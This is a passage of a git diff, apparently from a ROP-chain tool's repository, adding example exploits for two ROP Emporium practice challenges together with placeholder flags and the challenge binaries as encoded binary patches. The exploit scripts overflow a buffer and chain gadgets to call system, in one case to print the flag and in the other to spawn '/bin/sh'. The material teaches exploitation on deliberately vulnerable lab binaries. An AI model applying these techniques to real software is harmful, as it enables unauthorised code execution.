zC47mb8TJKg8`qn`4kdLYGQPG<6j_&1ByEw@NqgzOP;Ub9EN-SO&HivIO&Mm=ObG^b
zsc<Yv4yx1@Glfs~oexD{M-rkL?!j4RrukAynKI@JcdBQoGlU>4S+3T&w>-FfM?1_=
zO)ws9M;nk>Cu_2T;f4qw9_u(B)%^MEzm@3s5?(R6_iK&Y4{0L5n7=P2h!fe`>9Y{%
zn-0^Pq!zbdamgmlwfr8jv_fn^!S2uB6{ZTfh7A>W`qu-$f^R^s|G3*PEsraJ^h6~V
z%Y7#+QEW$nzIoYy*zJcT@Vz3Ls8F1~o9Wtle#S2rNw?vQDLm)T-!rAELjJC{tS9&1
zJ}Bs$mh0#5p2g}zoqo3xar@bh`JK?wH!{ooeWWXYjhsQw_FJeB^m~^2l>PZTN@k(~
zZ^c2x^*gWs5Om~UOGcpQru!9_Oz^q@`BR@c{T~2E{i>Rq%SSy$g960s9hPL(#bx6C
zIPCuX{Wh%pWloCCp-h#TA9MKgciw<%D7TkGIOXp;{P}mw31xVZJJwMz$NPc9pVxs7
z(Vzs)v{>#;eQl>FAkg)5HT-*RK>3f_jZt>C|7Q+={(a7Q^z{yZXZ<oW4mMo>;2gj7
z7*q>gRn#~eIqQEOIxh}-hKP9Gi}UK8_D=aF_{_t>{`~zrzLKI%zFw#Q>#(6FvVZP7
z^E2fA@BQC~4UJv)=XD|ezX$&R1|HvBKaaoT@U_>^-`(S@pa8MGB~8eTe*lHuKlgpE
zSstD2s5tvE9|vyt=kJD2&2r#&D)&k4p><7)#n*pOYn7%wnq;EVV!5+|bFv4OQ~gdm
z_OHrWS_QHtVm=>bu3IY9srw67VGbKA+#$+1Ja+B=CpAktspb(H4jXZBzw!J(6Ih}8
OTPrO8B@U&t{(k~uVnCb#

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/split/exploit.py b/examples/rop_emporium/split/exploit.py
new file mode 100644
index 0000000..ad6c292
--- /dev/null
+++ b/examples/rop_emporium/split/exploit.py
@@ -0,0 +1,16 @@
+from pwn import *
+from Exrop import Exrop
+
+binname = "./split"
+p = process(binname)
+elf = ELF(binname)
+catflag = next(elf.search(b"/bin/cat flag.txt"))
+system = elf.symbols['system']
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+chain = rop.func_call(system, (catflag, 0))
+chain.dump()
+buf = b"A"*0x28
+pay = buf + chain.payload_str()
+p.sendlineafter("> ", pay)
+p.interactive()
diff --git a/examples/rop_emporium/split/flag.txt b/examples/rop_emporium/split/flag.txt
new file mode 100644
index 0000000..918aaf6
--- /dev/null
+++ b/examples/rop_emporium/split/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/split/split b/examples/rop_emporium/split/split
new file mode 100755
index 0000000000000000000000000000000000000000..f0873f553462f8f335f2c3f79c4eb14b0f2e54de
GIT binary patch
literal 9128
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
X#d+g(8K-%v`tc}<blDT!TmOFm)blDH

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/write4/exploit.py b/examples/rop_emporium/write4/exploit.py
new file mode 100644
index 0000000..2c0740f
--- /dev/null
+++ b/examples/rop_emporium/write4/exploit.py
@@ -0,0 +1,17 @@
+from Exrop import Exrop
+from pwn import *
+
+binname = "write4"
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+elf = ELF(binname, checksec=False)
+bss = elf.bss()
+system = elf.symbols['system']
+chain = rop.func_call(system, ("/bin/sh",), elf.bss())
+chain.dump()
+ret = p64(0x0000000000400806) # for padding
+buf = b"A"*40
+buf += ret + chain.payload_str() # ret for padding
+p = process(binname)
+p.sendlineafter("> ", buf)
+p.interactive()
diff --git a/examples/rop_emporium/write4/flag.txt b/examples/rop_emporium/write4/flag.txt
new file mode 100644
index 0000000..918aaf6
--- /dev/null
+++ b/examples/rop_emporium/write4/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/write4/write4 b/examples/rop_emporium/write4/write4
new file mode 100755
index 0000000000000000000000000000000000000000..a8f133fc7c4ca2ed6d957a5c08c70629a2e27836
GIT binary patch
literal 9136
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
Rm=`Obj+B(%b~$&K{~u(nC2{}&

literal 0
HcmV?d00001